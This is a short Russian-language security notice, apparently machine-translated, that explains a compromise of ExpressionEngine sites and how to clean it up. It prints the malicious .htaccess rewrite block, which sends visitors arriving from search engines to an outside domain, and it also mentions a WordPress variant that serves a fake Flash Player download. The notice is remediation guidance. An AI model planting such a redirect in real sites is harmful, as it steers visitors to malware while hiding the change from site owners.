Перенаправления происходят с компрометации в файл .htaccess
вашего сайта и влияют только на клики от популярных поисковых систем.Непосредственный доступ к сайту не оказывает никакого влияния и помогает предотвратить обнаружение вредоносного ПО.
Найдите следующий код в каталоге вашего сайта и удалите его:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>
Возможно, вам потребуется просмотреть«скрытые файлы» в вашем FTP-клиенте или используйте ls -al
из командной строки для просмотра вашего .htaccess
файла.
После того, как вы решите проблему, вам нужно убедиться, что выпод управлением самой последней версии ExpressionEngine ( EE 1.7.1 или EE 2.3.1 на момент написания этой статьи), а также любой сторонней Надстройки .
Аудит access_logs
вашего сервера может помочь выявить уязвимость, которая привела к компрометации, и посмотреть метку времени изменения файлов в каталоге вашего сайта.
вариант этой атаки уже затронул многие установки WordPress, в результате чего крошечный фрагмент JavaScript с кодировкой base64_encoded был добавлен непосредственно перед закрывающим тегом </body>
, что приводит к тому, что посетители получают вредоносное ПОЗараженный Adobe Flash Player скачать.